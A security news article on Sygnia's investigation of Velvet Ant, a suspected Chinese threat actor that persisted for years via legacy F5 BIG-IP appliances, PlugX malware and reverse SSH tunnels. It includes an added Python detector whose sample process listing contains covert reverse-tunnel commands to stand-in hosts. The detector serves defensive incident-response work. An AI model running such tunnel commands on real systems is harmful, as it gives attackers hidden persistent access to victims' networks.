A Chinese state-sponsored threat actor was seen maintaining persistent access to a victim organization’s network for three years using a legacy F5 BIG-IP appliance, cybersecurity firm Sygnia reports.
Dubbed Velvet Ant, the threat actor used multiple mechanisms to maintain a foothold in the organization’s network, quickly pivoting to new ones whenever an existing mechanism was remediated and showing adaptability in evading detection.
“This threat actor had infiltrated the organization’s network at least two years prior to the investigation, and had succeeded in gaining a strong foothold, and intimate knowledge of the network,” the cybersecurity firm notes.
Velvet Ant was seen using various tools and techniques to compromise critical systems and access sensitive data, and deployed dormant persistence mechanisms in unmonitored systems, including the PlugX remote access trojan (RAT).
The threat actor was observed employing DLL search order hijacking, DLL sideloading, and phantom DLL loading, as well as tampering with the installed security software before deploying the PlugX malware.
Demonstrating a high level of operational security (OPSEC) awareness, the hacking group did not install the malware on a workstation on which it failed to disable the security software.
Velvet Ant also used the open source tool Impacket for lateral tool transfer and remote code execution on compromised machines, and created firewall rules to allow connections to the command-and-control (C&C) server.
After Sygnia evicted the threat actor from the victim’s network, it observed Velvet Ant infecting new machines with PlugX samples reconfigured to use an internal server as their C&C, channeling the malware’s external communication through that server.
Essentially, the threat actor infected internet-connected systems with a PlugX variant configured with an external C&C server, used to exfiltrate sensitive information, and infected a legacy server with a variant that had no C&C configured at all.
Velvet Ant maintained access to the legacy file server through two F5 BIG-IP appliances running outdated, vulnerable software, using a reverse SSH tunnel connection.
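A responder checking an appliance for this kind of access would look for an ssh client process carrying a remote-forward option, since that is what a reverse SSH tunnel looks like on the host. The following is an added example, not Sygnia’s tooling or anything recovered from the incident; it assumes a `ps -eo pid,user,args`-style listing collected from the appliance’s Linux host shell and parses ssh(1) option syntax (bare `-R`, attached `-R2222:…`, combined short flags such as `-fNR`, and `-o RemoteForward=…`) to flag the processes of interest. The process listing is constructed for the example.

```python
"""Flag reverse SSH tunnel processes in a process listing.

Added example, not Sygnia's tooling or data from the incident. It assumes
a `ps -eo pid,user,args`-style listing taken from a Linux host shell,
which is where a responder would look for the reverse SSH access
described in the article.
"""
import os
import shlex

# Constructed sample listing for this example; not data from the incident.
SAMPLE_PS = """\
  PID USER     COMMAND
    1 root     /sbin/init
  842 root     /usr/bin/ssh -fN -R 2222:127.0.0.1:22 -i /var/tmp/.k -o ServerAliveInterval=30 ops@203.0.113.7
 1011 root     /usr/sbin/sshd -D
 1203 root     ssh -L 8080:10.0.0.5:80 admin@10.0.0.5
 1307 root     autossh -M 0 -oRemoteForward=0.0.0.0:4444:localhost:443 -N tun@198.51.100.9
 1422 root     /usr/bin/python3 /var/tmp/.s
"""

SSH_CLIENTS = {"ssh", "autossh", "dbclient"}   # dbclient: dropbear's ssh client
ARG_FLAGS = set("BbcDEeFIiJLlmOopQRSWw")       # ssh(1) options that take a value
FORWARD_OPTS = {"remoteforward": "remote", "localforward": "local",
                "dynamicforward": "dynamic"}


def classify_ssh(cmdline):
    """Describe an ssh client command line, or return None if it is not one.

    Keys: remote/local/dynamic forwarding, and 'background' when -f or -N
    is present (no interactive session, typical of a persistence tunnel).
    """
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None
    if not argv or os.path.basename(argv[0]) not in SSH_CLIENTS:
        return None
    info = {"remote": False, "local": False, "dynamic": False, "background": False}
    i = 1
    while i < len(argv):
        tok = argv[i]
        i += 1
        if len(tok) < 2 or not tok.startswith("-") or tok.startswith("--"):
            continue  # destination, remote command, or '--'
        flags = tok[1:]
        for j, ch in enumerate(flags):
            if ch in "fN":
                info["background"] = True
                continue
            if ch not in ARG_FLAGS:
                continue
            value = flags[j + 1:]                # '-R2222:...' attached form
            if not value and i < len(argv):      # '-R 2222:...' separate form
                value = argv[i]
                i += 1
            if ch == "R":
                info["remote"] = True
            elif ch == "L":
                info["local"] = True
            elif ch == "D":
                info["dynamic"] = True
            elif ch == "o":
                name = value.split("=", 1)[0].strip().lower()
                if name in FORWARD_OPTS:
                    info[FORWARD_OPTS[name]] = True
            break  # the rest of this token was the option's value
    return info


def find_reverse_tunnels(ps_text):
    """Return [(pid, user, cmdline)] for ssh clients with remote forwarding."""
    hits = []
    for line in ps_text.splitlines()[1:]:       # skip the ps header
        line = line.strip()
        if not line:
            continue
        pid, user, cmd = line.split(None, 2)
        info = classify_ssh(cmd)
        if info and info["remote"]:
            hits.append((int(pid), user, cmd))
    return hits


if __name__ == "__main__":
    for pid, user, cmd in find_reverse_tunnels(SAMPLE_PS):
        print(f"reverse tunnel pid={pid} user={user}: {cmd}")
```

On the sample listing only the two remote-forwarding clients (PIDs 842 and 1307) are reported; the local forward and the sshd daemon are ignored. A hit with `background` set and a key file under a temporary directory, as in PID 842, is the pattern worth escalating.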
“The PlugX instance on the compromised file server was used by the threat actor as an internal C&C server. From this server, the threat actor conducted reconnaissance activities, deployed additional instances of the PlugX onto legacy servers by leveraging Impacket’s WmiExec,” Sygnia notes.
The compromised F5 BIG-IP appliances were used by the victim for firewall, WAF, load balancing and local traffic management services. Both devices were directly exposed to the internet and they may have been hacked through the exploitation of known vulnerabilities.
On one of the compromised F5 appliances, the threat actor deployed tools such as VelvetSting (for receiving commands from the C&C), VelvetTap (to capture network packets), Samrid (the open source SOCKS proxy tunneler EarthWorm), and Esrde (with the same capabilities as VelvetSting).
Considering the targeted organization, the use of ShadowPad and PlugX malware, and the use of DLL sideloading techniques, Sygnia believes that Velvet Ant is a state-sponsored threat actor operating out of China.